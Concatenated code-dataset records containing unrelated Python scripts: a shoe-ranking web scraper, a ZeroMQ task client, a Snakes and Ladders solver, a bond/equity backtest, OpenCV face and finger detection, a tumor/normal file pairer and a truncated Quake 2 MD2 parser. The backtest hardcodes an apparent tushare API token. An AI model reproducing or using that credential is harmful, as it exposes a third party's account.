datoteko.'''\n    pripravi_imenik(ime_datoteke)\n    with open(ime_datoteke, 'w', encoding='utf-8') as json_datoteka:\n        json.dump(objekt, json_datoteka, indent=4, ensure_ascii=False)\n# s tem vzorcem bom našla linke posameznih modelov\nvzorec1 = re.compile(r'<a href=\"(?P<link>.*?)\".*?target=\"_self\">')\n# na vsakem linku za model bom zajela podatke:\nvzorec2 = re.compile(\n    r'.*?(?P<model>.*?).*?'\n    r'.*?User ratings.*?\\n.*?(?P<ocena>.*?) / 5 based on (?P<stevilo_ocen>.*?) ratings.*?'\n    r'(?P<karkoli>.*?).*?'\n    r'.*?(?P<cena>.*?).*?'\n    r'.*?Top 1% overall.*?\\n.*?Best running shoes.*?\\n.*?\\n.*?\\n.*?\\n.*?\\n.*?\\n.*?\\n.*?\\n.*?\\n.*?\\n.*?Top 1% (?P<teren>.*?).*?\\n.*?Best (?P<znamka>.*?) running shoes'\n\n)\n\n\ndef nalozi_strani():\n    for i in range(0, 33):\n        url = ('https://runrepeat.com/ranking/rankings-of-running-shoes?page={}').format(i)\n        shrani_spletno_stran(url, 'zajeti-podatki/stran-{}.html'.format(i))\n    print('Shranjeno')\n\n#zajela bom vse strani različnih modelov, na straneh je link ki navigira do strani posameznega modela\n\npodatki_filmov = []\ndef ujemanje_linki(vzorec):\n    for i in range(1, 33):\n        vsebina = vsebina_datoteke('zajeti-podatki/stran-{}.html'.format(i))\n        for ujemanje_modela in vzorec.finditer(vsebina):\n            podatki_filmov.append(ujemanje_modela.group(1))\n    return podatki_filmov\n\n# vsak link do modela, bom shranila v mapo modeli - tu so podatki posameznega modela\n\ndef zapisi_stran(podatki):\n    for i in range(0,len(podatki)):\n        shrani_spletno_stran(podatki[i],'modeli/model-{}.html'.format(i))\n    print('Done')\n\n\n#regularni izraz, ki bo nasel ceno modela\n#vzorec_cena = re.compile(r'(?P<cena>.*?)', flags=re.DOTALL)\nvzorec_cena = re.compile(r'(\\n.*?)Price(\\n.*?)(\\n.*).*?(\\n.*?).*?(?P<cena>.*?).*?')\n#izraz, ki bo nasel teren\nvzorec_teren = re.compile(r'.*?(?P<teren>.*?).*?\\n.*?')\n#izraz, ki najde znamko\n# znamka= re.compile(r'.*?Top 1% overall.*?\\n.*?Best running shoes.*?\\n.*?\\n.*?\\n.*?\\n.*?\\n.*?\\n.*?\\n.*?\\n.*?\\n.*?\\n.*?Top 1% (?P<teren>.*?).*?\\n.*?Best (?P<znamka>.*?) running shoes')\n#izraz, ki najde ime modela \nime_modela = re.compile(r'.*?(?P<model>.*?).*?')\n#izraz, ki najde oceno modela in stevilo ozen\nocena_in_st = re.compile(r'.*?User ratings.*?\\n.*?(?P<ocena>.*?) / 5 based on (?P<stevilo_ocen>.*?) ratings
.*?',\n                        flags=re.DOTALL\n                        )\n \n\nznamka_preko_linka = re.compile(r'<img.*?src=\"(?P<karkoli>.*?)\" alt=\"(?P<znamka>.*?) brand logo\">')\n\n\n\n# podatki57 = {}\n# vsebina2 = vsebina_datoteke('modeli/model-957.html')\n# for ujemanje3 in cena.finditer(vsebina2):\n#     test = ujemanje3.groupdict()\n    \n# print(test)\n\n    \n\n    \ndef izloci_podatke_modela(vsebina):\n    podatki = {}\n    for ujemanje3 in znamka_preko_linka.finditer(vsebina):\n        test3 = ujemanje3.groupdict(1)\n        del test3['karkoli']\n        podatki['znamka'] = str(test3['znamka'])\n    \n    for ujemanje4 in ime_modela.finditer(vsebina):\n        test4 = ujemanje4.groupdict(1)\n        podatki['model'] = str(test4['model'])\n    \n    for ujemanje2 in vzorec_teren.finditer(vsebina):\n        test2 = ujemanje2.groupdict(1)\n        podatki['teren'] = str(test2['teren'])\n    \n    ujemanje1 = vzorec_cena.search(vsebina)\n    if ujemanje1:\n        podatki['cena'] = int(str(ujemanje1['cena']).strip('€'))\n    else:\n        podatki['cena'] = None\n    \n    ujemanje5 = ocena_in_st.search(vsebina)\n    if ujemanje5:\n        podatki['ocena'] = str(ujemanje5['ocena'])\n        podatki['stevilo ocen'] = str(ujemanje5['stevilo_ocen'])\n        # test5 = ujemanje5.groupdict(1)\n        # podatki['ocena'] = float(test5['ocena'])\n        # podatki['stevilo ocen'] = int(test5['stevilo_ocen'])\n    else:\n        podatki['ocena']= None\n        podatki['stevilo ocen'] = None\n    \n    return podatki\n\n\n\npodatki_modelov_skupaj = []\ndef zapisi_modele():\n    for i in range(0, 959):\n        vsebina_modela = vsebina_datoteke('modeli/model-{}.html'.format(i))\n        podatki_modelov_skupaj.append(izloci_podatke_modela(vsebina_modela))\n\nzapisi_json(podatki_modelov_skupaj, 'obdelani-podatki/vsi-modeli.json')\nzapisi_csv(podatki_modelov_skupaj, ['znamka', 'model', 'teren', 'cena','ocena', 'stevilo ocen'],'obdelani-podatki/vsi-modeli.csv')\n\n\n","sub_path":"zajem.py","file_name":"zajem.py","file_ext":"py","file_size_in_byte":6832,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"} +{"seq_id":"180346662","text":"\n# 此脚本是负责和中间层同心,修改客户端的任务列表和作业\n\nimport zmq,time\nimport json,socket\nimport logging\n\n\nclass oprate_task_job:\n    def __init__(self,port = 9995):#端口要与本地setting。OUT_PORT 一致\n        context = zmq.Context()\n        self.port = str(port)\n        # print('connect to server')\n        self.socket = context.socket(zmq.REQ)\n        self.socket.connect('tcp://localhost:'+self.port)\n        self.poll = zmq.Poller()\n        self.poll.register(self.socket, zmq.POLLIN)\n        \"\"\"日志\"\"\"\n        logging.basicConfig(level=logging.DEBUG,\n                            format='%(asctime)s %(filename)s[line:%(lineno)d] %(levelname)s %(message)s',\n                            datefmt='%a, %d %b %Y %H:%M:%S',\n                            filename='myapp.log',\n                            filemode='a')\n        #################################################################################################\n        # 定义一个StreamHandler,将INFO级别或更高的日志信息打印到标准错误,并将其添加到当前的日志处理对象#\n        console = logging.StreamHandler()\n        console.setLevel(logging.INFO)\n        formatter = logging.Formatter('%(name)-12s: %(levelname)-8s %(message)s')\n        console.setFormatter(formatter)\n        logging.getLogger('').addHandler(console)\n        #################################################################################################\n\n    def _port_is_free(self,port):#检查端口是否被占用,可用返回true\n        s = socket.socket()\n        s.settimeout(0.5)\n        try:\n            # s.connect_ex return 0 means port is open\n            return s.connect_ex(('localhost', port)) != 0\n        finally:\n            s.close()\n    def add_task(self,task): #成功返回的是——id\n        mes = {'command':'add',\"task\":task,'type':'task'}\n        self.send(mes)\n        return self.recv()\n    def del_task(self,id):# 'content': {'ok': 1.0, 'n': 1}}\n        mes = {'command':'del',\"guid\":id,'type':'task'}\n        self.send(mes)\n        return
self.recv()\n def update_task(self,arg):#content': {'nModified': 1, 'n': 1, 'ok': 1.0, 'updatedExisting': True} content': {'ok': 1.0, 'updatedExisting': False, 'n': 0, 'nModified': 0}\n #arg = {\"guid\":14,\"device.id\":\"guojianyu\"}#arg的格式\n mes = {'command': 'update', \"content\": arg, 'type': 'task'}\n self.send(mes)\n return self.recv()\n def pop_task(self,arg):#支持精确查找返回一个查找结果,只支持精确查找\n #arg = {\"guid\": 12, \"device.id\": \"guojianyu\"}#查找任务的格式\n mes = {'command': 'pop', \"pop\":arg, 'type': 'task'}\n self.send(mes)\n return self.recv()\n\n def add_job(self,task):#添加作业\n #需要传递整个任务属性,服务器会根据topic来确定任务类型,同过任务属性来确定生成的作业的周期等信息\n mes = {'command': 'add', \"task\": task, 'type': 'job'}\n self.send(mes)\n return self.recv()\n def del_job(self,id):#删除作业 只关心success的标示\n mes = {'command': 'del', \"job_id\": id, 'type': 'job'}\n self.send(mes)\n return self.recv()\n def update_job(self,arg):#更新作业 只关心success的标示\n mes = {'command': 'update', \"content\":{}, 'type': 'job'}\n mes['content'] = {'job_id':'sku131',' seconds':6}\n self.send(mes)\n return self.recv()\n def pop_job(self,id):#查找作业\n mes = {'command': 'pop', \"job_id\": id, 'type': 'job'}\n self.send(mes)\n return self.recv()\n def pause_job(self,id):#暂停作业 不需要关心返回值\n mes = {'command': 'pause', \"job_id\": id, 'type': 'job'}\n self.send(mes)\n return self.recv()\n def resume_job(self,id):#回复作业 不需要关心返回值\n mes = {'command': 'resume', \"job_id\": id, 'type': 'job'}\n self.send(mes)\n return self.recv()\n\n def send(self,mes):\n self.socket.send(json.dumps(mes).encode('utf-8'))\n while True:#服务器中断会一直尝试重连\n socks = dict(self.poll.poll(3000))\n if socks.get(self.socket) == zmq.POLLIN:\n break\n else:\n self.socket.setsockopt(zmq.LINGER, 0)\n self.socket.close()\n self.poll.unregister(self.socket)\n context = zmq.Context()\n self.socket = context.socket(zmq.REQ)\n self.socket.connect('tcp://localhost:'+self.port)\n self.poll.register(self.socket, zmq.POLLIN)\n self.socket.send(json.dumps(mes).encode('utf-8'))\n\n def recv(self):\n return self.socket.recv_json()\n\n def write_log(self,arg):#写日志 arg的格式 {'level':,'content':....}level是写扫描类型的日志,content是日志内容\n level= arg['level']#得到日志等级\n content = arg['content']# 日志内容\n if level == 'info':\n logging.info(content)\n elif level == 'debug':\n logging.debug(content)\n elif level == 'warning':\n logging.warning(content)\n elif level == 'error':\n logging.error(content)\n\n\n def upload_data(self,content):#上传数据接口\n mes = {'command': 'upload', \"content\": content, 'type': 'data'}\n self.send(mes)\n return self.recv()\nif __name__ == \"__main__\":\n level = ['info','debug','warning','error']\n\n task = {\"device\":\n {'type': \"\", 'version': '127.22', 'id': ''},\n 'guid': 14, 'time': time.time(), 'timeout': 40, 'topic': 'jd_task_kind',\n 'interval': 6000, # 任务执行周期间隔时间\n 'suspend': 0, # 暂停标识\n 'status': 0,\n\n 'body': {\n 'kind': '9987,830,866', 'platform': 'jd_app', 'sort': None,\n \"url\": \"https://list.jd.com/list.html?\",\n \"maxpage\": 0,\n 'shopid':1,\n \"cookie_type\": \"jd_web\",\n 'key_search': 0,\n \"data\": {\n 'key_word': '',\n \"cat\": \"670,671,672\",\n \"sort\": \"sort_rank_asc\",\n \"trans\": \"1\",\n \"page\": \"1\",\n \"JL\": \"6_0_0\"\n }\n }}\n\n obj = oprate_task_job(9995)\n arg = {'level':'info','content':'aps_all_copy'}\n ret = obj.add_task(task)\n print (ret)\n\n\n","sub_path":"client槽位增多版_test/excutor_doc/_interface.py","file_name":"_interface.py","file_ext":"py","file_size_in_byte":6491,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"} 
+{"seq_id":"535192973","text":"from collections import deque\n\ndef bfs(board):\n visited = dict(zip(list(range(0, 101)), [False] * 101))\n neighbors = deque()\n visited[1] = True\n first_value = [1, 0]\n neighbors.append(first_value)\n value = []\n while len(neighbors) != 0:\n value = neighbors.popleft();\n current_position = value[0]\n if current_position == 100:\n break\n for i in range((value[0] + 1), (value[0] + 7)):\n if i < 101:\n if not visited[i]:\n if i % 10 != 0:\n x = int(i / 10)\n y = (i % 10) - 1\n else:\n y = 9\n x = int(i / 10) - 1\n value_at_position = [board[x][y], value[1] + 1]\n visited[i] = True\n neighbors.append(value_at_position)\n if value_at_position[0] == 100:\n return value_at_position[1]\n else:\n break\n if not visited[100]:\n return -1\n return value[1]\n\n\ndef main():\n T = int(input())\n for cases in range(T):\n board = []\n\n # Creating the board for the game\n count = 0\n for i in range(10):\n templist = []\n for j in range(10):\n count += 1\n templist.insert(count, count)\n board.append(templist)\n\n ladders = int(input())\n\n # Adding ladders to the board\n for i in range(ladders):\n num = input().split(\" \")\n position = int(num[0])\n x = int(position / 10)\n y = (position % 10) - 1\n board[x][y] = int(num[1])\n\n snakes = int(input())\n\n # Adding Snakes to the board\n for i in range(snakes):\n num = input().split(\" \")\n position = int(num[0])\n x = int(position / 10)\n y = (position % 10) - 1\n board[x][y] = int(num[1])\n\n print(bfs(board))\n\nif __name__ == '__main__':\n main()","sub_path":"HackerRankProblems/src/SnakesAndLadders.py","file_name":"SnakesAndLadders.py","file_ext":"py","file_size_in_byte":2054,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"} +{"seq_id":"604338750","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Sun Jan 17 23:22:00 2021\n\n@author: xingxing\n\"\"\"\n\nfrom src.common import *\n\n# ================简单组合策略 15% - 85%====================\n\nguozhai = pd.read_csv('data/000012.csv', encoding='gbk')\nhs_300 = pd.read_csv('data/000300.csv', encoding='gbk')\n\n\nguozhai = pd.read_csv('data/217011.csv')\nguozhai = guozhai.set_index('净值日期').sort_index()\n\nhs_300.set_index('日期', inplace=True)\nhs_300.sort_index(inplace=True)\n\ntotal = pd.concat([guozhai['累计净值'].rename('债券'), hs_300.收盘价.rename('沪深300')], axis = 1)\n\ntotal.sort_index(inplace=True)\n\ntotal_2015 = total[total.index >= '2015-01-01']\n\ntotal_2015 = total_2015.dropna()\n\ntotal_2015\n\npnl = simple_holding_strategy_balance(total_2015, np.array([0.85, 0.15]))\n\nget_annual_return(pnl)\nget_max_drawdown(pnl)\nget_mar(pnl)\n\nplt.plot(pnl)\n\n'''\nget_annual_return(pnl)\nOut[40]: 0.047026454832702624\n\nget_max_drawdown(pnl)\nOut[41]: 0.10226021189244701\n\nget_mar(pnl)\nOut[42]: 0.45987050058299384\n'''\n\n# ============================================\n\nguozhai_rate = pd.read_csv('data/中国十年期国债收益率历史数据.csv')\n\nguozhai_rate\n\ndef to_time_str(date):\n year_index = date.find('年')\n month_index= date.find('月')\n day_index = date.find('日')\n # print(year_index, month_index, day_index)\n year = int(date[0:year_index])\n month = int(date[year_index+1:month_index])\n day = int(date[month_index+1:day_index])\n date = datetime.datetime(year, month, day).strftime('%Y-%m-%d')\n return date\n\nguozhai_rate['date'] = guozhai_rate['日期'].apply(to_time_str)\nguozhai_rate.set_index('date', inplace=True)\nguozhai_rate.sort_index(inplace=True)\n\nguozhai_rate\n\nguozhai_rate.收盘.plot(figsize=(16, 
9))\n\nts.set_token('ec4caba8049b4697b0d6006052c0ac3c6aae5ce8927463b296cbd2d6')\n\npro = ts.pro_api()\n\nhs300_pe = pd.read_csv(r'data/000300_pe.csv')\nhs300_pe.head()\n\nhs300_pe.set_index('trade_date', inplace=True)\n\nhs300_pe.plot(subplots=True)\n\nindicator_股债性价比 = pd.concat([hs300_pe.pe_ttm.rename('pe'), guozhai_rate.收盘.rename('利率')], axis=1)\n\nindicator_股债性价比.sort_index(inplace=True)\n\nindicator_股债性价比['股债性价比'] = (1.0 / indicator_股债性价比.pe) / indicator_股债性价比.利率\n\nindicator_股债性价比.股债性价比.plot(figsize = (16, 9))\n\nindicator_股债性价比.info()\n\nindicator_股债性价比.shape\n\n\npd.concat([indicator_股债性价比.股债性价比, hs_300.收盘价], axis = 1).sort_index().dropna().plot(figsize=(16, 9), subplots=True)\n\n\nindicator_股债性价比.股债性价比\ndata_股债性价比 = total_2015.copy()\ndata_股债性价比['cash'] = 1\ndata_股债性价比\n\ndef is_balance_day(today, yesterday):\n today = get_datetime_from_str(today).month\n yesterday = get_datetime_from_str(yesterday).month\n if today != yesterday:\n return True\n \n return False\n\n# 债券 股票 现金\ns_w = np.array([0, 0, 1])\ns_ret = np.array([])\n\nfor i in np.arange(0, total_2015.shape[0]):\n if i == 0:\n s_w = np.array([0, 0, 1])\n s_ret = np.append(s_ret, 1)\n continue\n else:\n yd_md = data_股债性价比.values[i-1, ]\n td_md = data_股债性价比.values[i, ]\n s_rtn = td_md / yd_md\n \n s_w = s_w * s_rtn\n s_ret = np.append(s_ret, s_w.sum())\n \n if is_balance_day(data_股债性价比.index[i], data_股债性价比.index[i-1]):\n print(data_股债性价比.index[i])\n cur_股债性价比 = indicator_股债性价比.股债性价比[data_股债性价比.index[i]]\n cur_ret = s_ret[-1]\n \n zhaiquan_ratio = cur_ret * 0.8\n gupiao_ratio = (cur_ret - zhaiquan_ratio) * ((cur_股债性价比 - 0.015) / (0.035 - 0.015))\n cash_ratio = cur_ret - zhaiquan_ratio - gupiao_ratio\n \n s_w = np.array([zhaiquan_ratio, gupiao_ratio, cash_ratio])\n print(s_w)\n # print(s_w)\n \nget_annual_return(s_ret)\nget_max_drawdown(s_ret)\nget_mar(s_ret)\n","sub_path":"src/.ipynb_checkpoints/固收+-checkpoint.py","file_name":"固收+-checkpoint.py","file_ext":"py","file_size_in_byte":4001,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"} +{"seq_id":"243411600","text":"# Detects face and fingers and does facial recognition using openCV\n\nimport module_manager\nmodule_manager.review()\n\nimport cv2 \nimport numpy as np\nimport math\nimport os\nfrom PIL import Image\n\n\"\"\"Used method to detect face from this tutorial\nhttps://docs.opencv.org/3.4.1/d7/d8b/tutorial_py_face_detection.html\"\"\"\n\n# xml files describing our haar cascade classifiers\nfaceCascadeFilePath = \"haarcascade_frontalface_default.xml\"\n# Build our cv2 Cascade Classifiers\nfaceCascade = cv2.CascadeClassifier(faceCascadeFilePath)\n# Collect video input from first webcam on system\ncap = cv2.VideoCapture(1)\n# Creates the recognizer which is used for facial recognition\nrecognizer = cv2.face.LBPHFaceRecognizer_create()\n\ndef returnFaces():\n \n while True:\n \n # Reads image\n ret, frame = cap.read()\n # Converts image to grayscale\n gray = cv2.cvtColor(frame, cv2.COLOR_BGR2GRAY)\n # Detects face in the captured frame\n faces = faceCascade.detectMultiScale(gray, 1.3, 5)\n # If any faces detected, returns True\n for (x, y, w, h) in faces:\n return True\n return False\n\n\"\"\"Followed this tutorial to detect hand and return number of fingers\nhttps://www.quora.com/What-is-the-easiest-way-to-recognise-gestures-in-\nOpenCV-using-Python\"\"\"\n\ndef returnFingers():\n \n try:\n while(cap.isOpened()):\n \n # Read images\n ret, img = cap.read()\n # Creates a small sub window in top right corner to look for hands\n 
cv2.rectangle(img, (300,300), (100,100), (0,255,0),0)\n crop_img = img[100:300, 100:300]\n # Converts image to grayscale\n gray = cv2.cvtColor(crop_img, cv2.COLOR_BGR2GRAY)\n # Applys a blur so difference in colors is easier to detect\n blurSize = (35, 35)\n blurred = cv2.GaussianBlur(gray, blurSize, 0)\n # Thresholds image using Otsu's Binarization method\n _, thresh1 = cv2.threshold(blurred, 127, 255,\n cv2.THRESH_BINARY_INV+cv2.THRESH_OTSU)\n # UNCOMMENT TO DEBUG AND VIEW THRESHOLDED IMAGE IN ANOTHER WINDOW\n #cv2.imshow('Thresholded', thresh1)\n image, contours, hierarchy = cv2.findContours(thresh1.copy(), \\\n cv2.RETR_TREE, cv2.CHAIN_APPROX_NONE)\n # Finds the contour with max area\n cnt = max(contours, key = lambda x: cv2.contourArea(x))\n # Finds convex hull\n hull = cv2.convexHull(cnt)\n # Drawing contours\n drawing = np.zeros(crop_img.shape,np.uint8)\n cv2.drawContours(drawing, [cnt], 0, (0, 255, 0), 0)\n cv2.drawContours(drawing, [hull], 0,(0, 0, 255), 0)\n # Finds convex hull\n hull = cv2.convexHull(cnt, returnPoints=False)\n # Finds convexity defects\n defects = cv2.convexityDefects(cnt, hull)\n countDefects = 0\n cv2.drawContours(thresh1, contours, -1, (0, 255, 0), 3)\n \n # Applies Cosine Rule to find angle for all defects between fingers\n for i in range(defects.shape[0]):\n s,e,f,d = defects[i,0]\n \n start = tuple(cnt[s][0])\n end = tuple(cnt[e][0])\n far = tuple(cnt[f][0])\n \n # Finds the length of all sides of triangle\n a = math.sqrt((end[0] - start[0])**2 + (end[1] - start[1])**2)\n b = math.sqrt((far[0] - start[0])**2 + (far[1] - start[1])**2)\n c = math.sqrt((end[0] - far[0])**2 + (end[1] - far[1])**2)\n \n # Applies the cosine rule \n angle = math.acos((b**2 + c**2 - a**2)/(2*b*c)) * 57\n \n # ignore angles > 90 and highlight rest with red dots\n if angle <= 90:\n countDefects += 1\n cv2.circle(crop_img, far, 1, [0,0,255], -1)\n #dist = cv2.pointPolygonTest(cnt,far,True)\n \n # Number of count defects is one less than the number of fingers\n if 1 <= countDefects <= 4:\n return (countDefects + 1)\n # Either one finger or nothing detected\n else:\n return 0 \n\n # Avoids crashing of program if it cannot detect any shapes \n except Exception as e:\n print(\"crashed\")\n return 0 \n \n\"\"\"Watched this YouTube video to train and recognize faces\n https://www.youtube.com/watch?v=4W5M-YaJtIA&t=57s\"\"\"\n \ndef datasetGenerator(id):\n \n # Names files with users inputted name\n name = input(\"Enter your name:\")\n sampleNum = 0\n maxImages = 20\n \n while True:\n ret, frame = cap.read()\n gray = cv2.cvtColor(frame, cv2.COLOR_BGR2GRAY)\n faces = faceCascade.detectMultiScale(gray, 1.3, 5)\n for (x, y, w, h) in faces:\n sampleNum += 1\n # Saves the captured images in the dataset folder using users id\n cv2.imwrite(\"trainer/User\" + \".\" + str(name) + \".\" + str(id) + \".\" + str(sampleNum) + \".jpg\", gray[y:y+h,x:x+w])\n # Takes a photo every 100 ms\n cv2.waitKey(100)\n cv2.waitKey(1)\n # Takes twenty smaple pics of each user\n if sampleNum >= maxImages:\n return name\n \ndef getImagesAndLabels(path):\n \n # Get the path of each file in the folder\n imagePaths = [os.path.join(path,file) for file in os.listdir(path)]\n faceSamples, ids = [], []\n \n for path in imagePaths:\n # Loads the image and converts it to grayscale\n pilImage = Image.open(path).convert(\"L\")\n # Converts PIL image into a numpy array\n array = np.array(pilImage, \"uint8\")\n # Gets the the user's name from the image\n id = int(os.path.split(path)[-1].split(\".\")[2])\n faceSamples.append(array)\n 
ids.append(id)\n # Extracts a face from the image samples \n faces = faceCascade.detectMultiScale(array)\n return (faceSamples, ids)\n\nfaces, ids = getImagesAndLabels(\"trainer\")\nrecognizer.train(faces, np.array(ids))\nrecognizer.save(\"recognizer/trainingData.yml\")\n\n# Takes in a dictionary of ids to users and matches them\ndef recognizeFace(users):\n \n while True:\n name = \"\"\n # Reads image\n ret, frame = cap.read()\n # Converts image to grayscale\n gray = cv2.cvtColor(frame, cv2.COLOR_BGR2GRAY)\n # Detects face in the captured frame\n faces = faceCascade.detectMultiScale(gray, 1.2, 5)\n # If any faces detected, returns True\n for (x, y, w, h) in faces:\n # Uses the recognizer to predict user\n id, conf = recognizer.predict(gray[y:y+h,x:x+w])\n # If id found should be in dict but checks to avoid errors\n if str(id) in users:\n name = users[str(id)]\n # If id not detected uses \"User\" as the generic name\n else:\n name = \"User\"\n return name\n \n","sub_path":"openCV.py","file_name":"openCV.py","file_ext":"py","file_size_in_byte":7057,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"} +{"seq_id":"294288385","text":"#!/usr/bin/env python\ndescription = '''\nGiven a list of files as a single column list, \nthis program tries to figure out how they pair up\nto make a normal/tumor pair, assuming pairs exist\nwithin the input.\n\nOutput the resulting pairs in the following format:\n\nColumns:\nnormal_filename\ntumor_filename\n'''\n\nimport argparse\nimport re\nimport sys\n\nPATTERNS = (('_N','_T'),\n ('N_','T_'),\n ('_N_','_T_'),\n ('-N','-T'),\n ('N-','T-'),\n ('-N-','-T-'),\n ('.N','.T'),\n ('N.','T.'),\n ('.N.','.T.'))\n\ndef check_pattern(pattern, filenames_list):\n '''\n Given a pattern in PATTERNS, check\n if the pattern exists in filenames_list.\n If the pattern causes the filenames to divide\n in half, return True\n Otherwise, return False\n '''\n # Divide up the files\n n_files = []\n t_files = []\n for filename in filenames_list:\n match_n = re.search(pattern[0] ,filename)\n match_t = re.search(pattern[1], filename)\n if match_n and not match_t:\n n_files.append(filename)\n elif not match_n and match_t:\n t_files.append(filename)\n \n # If all the files divided up evenly, then pattern works\n len_n_files = len(n_files)\n len_t_files = len(t_files)\n\n # All files were divided evenly\n if len_n_files == len_t_files:\n if len_n_files + len_t_files == len(filenames_list):\n sys.stderr.write('Pattern %s divided up the files evenly\\n' % str(pattern))\n return n_files, t_files\n\n # Files were divided unevenly\n elif len_n_files > 0 and len_t_files > 0:\n if len_n_files + len_t_files == len(filenames_list):\n sys.stderr.write('Pattern %s divided up the files unevenly\\n' % str(pattern))\n return n_files, t_files\n \n return False\n\ndef search_matching_tumorfile(normalfile, tumorfiles, pattern):\n '''\n Given a normal filename, find the matching tumor file\n '''\n nf = normalfile.replace(pattern[0], pattern[1])\n nf = re.sub(r'_[ACGT]{6}_', '_.{4}_', nf)\n nf = re.sub(r'_L.{3}_', '_L..._', nf)\n for tf in tumorfiles: \n result = re.search(nf, tf)\n if result:\n return tf\n return False\n\ndef detect_pairs(samplenames):\n '''\n Figure out the N and T pairs from a list of filenames\n and return the pairs as a list of tuples, i.e.\n [(Sample1_N.bam, Sample1_T.bam),\n (Sample2_N.bam, Sample2_T.bam),\n (Sample3_N.bam, Sample3_T.bam)]\n '''\n \n # Check each pattern in PATTERNS against the filenames\n for pattern in PATTERNS:\n check_result = 
check_pattern(pattern, samplenames)\n\n # Files divided up either evenly or unevenly\n if check_result:\n normal_files = sorted(check_result[0])\n tumor_files = sorted(check_result[1])\n\n # Generate the matching pairs\n matched_pairs = []\n for n_file in normal_files:\n t_file = search_matching_tumorfile(n_file, tumor_files, pattern)\n if t_file:\n matched_pairs.append((n_file,t_file))\n \n # Check to make sure that the ordered files are matched up\n return matched_pairs\n\n # None of the patterns worked\n return False\n\ndef main():\n # Set up parameter options\n ap = argparse.ArgumentParser(description=description)\n ap.add_argument('input_file',\n help='Single column list of files',\n nargs='?',\n type=argparse.FileType('r'),\n default=sys.stdin)\n params = ap.parse_args()\n\n # Read all filenames into a list\n filenames = []\n for line in params.input_file:\n fname = line.strip().split()[0]\n filenames.append(fname)\n params.input_file.close()\n\n # Detect sample ids from filenames and map them\n sampleid2filename = {}\n for filename in filenames:\n # Look for index in the filename\n match = re.search(r'(.+)[ACTG]{6}', filename)\n if match:\n sampleid = match.group(1)\n sampleid2filename[sampleid] = filename\n continue\n # Look for lane number in the filename\n match = re.search(r'(.+)L\\d{3}', filename)\n if match:\n sampleid = match.group(1)\n sampleid2filename[sampleid] = filename\n continue\n\n # No match indicates index and lane number are not present in the filename\n sampleid2filename[filename] = filename\n\n # Detect the paired filenames\n pairs = detect_pairs(sorted(sampleid2filename.keys()))\n\n # Could not detect pairs\n if not pairs:\n sys.stderr.write('Could not detect paired files.\\n')\n sys.exit(1)\n\n # Output to standard output\n for pair in pairs:\n normal_file = sampleid2filename[pair[0]]\n tumor_file = sampleid2filename[pair[1]]\n sys.stdout.write('%s\\t%s\\n' % (normal_file, tumor_file))\n\n\nif __name__ == '__main__':\n main()\n","sub_path":"modules/somatic/detect_normal_tumor_pairs.py","file_name":"detect_normal_tumor_pairs.py","file_ext":"py","file_size_in_byte":5006,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"} +{"seq_id":"494694258","text":"\"\"\"This module provides file I/O for Quake 2 BSP map files.\n\nExample:\n bsp_file = bsp.Bsp.open('base1.bsp')\n\nReferences:\n Quake 2 Source\n - id Software\n - https://github.com/id-Software/Quake-2\n\"\"\"\n\nimport io\nimport struct\n\nfrom types import SimpleNamespace\n\n__all__ = ['BadMd2File', 'is_md2file', 'Md2']\n\n\nclass BadMd2File(Exception):\n pass\n\n\ndef _check_md2file(fp):\n fp.seek(0)\n data = fp.read(struct.calcsize('<4si'))\n identity, version = struct.unpack('<4si', data)\n\n return identity == b'IDP2' and version == 8\n\n\ndef is_md2file(filename):\n \"\"\"Quickly see if a file is a bsp file by checking the magic number.\n\n The filename argument may be a file for file-like object.\n \"\"\"\n result = False\n\n try:\n if hasattr(filename, 'read'):\n return _check_md2file(fp=filename)\n else:\n with open(filename, 'rb') as fp:\n return _check_md2file(fp)\n\n except:\n pass\n\n return result\n\nvertex_normals = (\n (-0.525731, 0.000000, 0.850651),\n (-0.442863, 0.238856, 0.864188),\n (-0.295242, 0.000000, 0.955423),\n (-0.309017, 0.500000, 0.809017),\n (-0.162460, 0.262866, 0.951056),\n (0.000000, 0.000000, 1.000000),\n (0.000000, 0.850651, 0.525731),\n (-0.147621, 0.716567, 0.681718),\n (0.147621, 0.716567, 0.681718),\n (0.000000, 0.525731, 
0.850651),\n (0.309017, 0.500000, 0.809017),\n (0.525731, 0.000000, 0.850651),\n (0.295242, 0.000000, 0.955423),\n (0.442863, 0.238856, 0.864188),\n (0.162460, 0.262866, 0.951056),\n (-0.681718, 0.147621, 0.716567),\n (-0.809017, 0.309017, 0.500000),\n (-0.587785, 0.425325, 0.688191),\n (-0.850651, 0.525731, 0.000000),\n (-0.864188, 0.442863, 0.238856),\n (-0.716567, 0.681718, 0.147621),\n (-0.688191, 0.587785, 0.425325),\n (-0.500000, 0.809017, 0.309017),\n (-0.238856, 0.864188, 0.442863),\n (-0.425325, 0.688191, 0.587785),\n (-0.716567, 0.681718, -0.147621),\n (-0.500000, 0.809017, -0.309017),\n (-0.525731, 0.850651, 0.000000),\n (0.000000, 0.850651, -0.525731),\n (-0.238856, 0.864188, -0.442863),\n (0.000000, 0.955423, -0.295242),\n (-0.262866, 0.951056, -0.162460),\n (0.000000, 1.000000, 0.000000),\n (0.000000, 0.955423, 0.295242),\n (-0.262866, 0.951056, 0.162460),\n (0.238856, 0.864188, 0.442863),\n (0.262866, 0.951056, 0.162460),\n (0.500000, 0.809017, 0.309017),\n (0.238856, 0.864188, -0.442863),\n (0.262866, 0.951056, -0.162460),\n (0.500000, 0.809017, -0.309017),\n (0.850651, 0.525731, 0.000000),\n (0.716567, 0.681718, 0.147621),\n (0.716567, 0.681718, -0.147621),\n (0.525731, 0.850651, 0.000000),\n (0.425325, 0.688191, 0.587785),\n (0.864188, 0.442863, 0.238856),\n (0.688191, 0.587785, 0.425325),\n (0.809017, 0.309017, 0.500000),\n (0.681718, 0.147621, 0.716567),\n (0.587785, 0.425325, 0.688191),\n (0.955423, 0.295242, 0.000000),\n (1.000000, 0.000000, 0.000000),\n (0.951056, 0.162460, 0.262866),\n (0.850651, -0.525731, 0.000000),\n (0.955423, -0.295242, 0.000000),\n (0.864188, -0.442863, 0.238856),\n (0.951056, -0.162460, 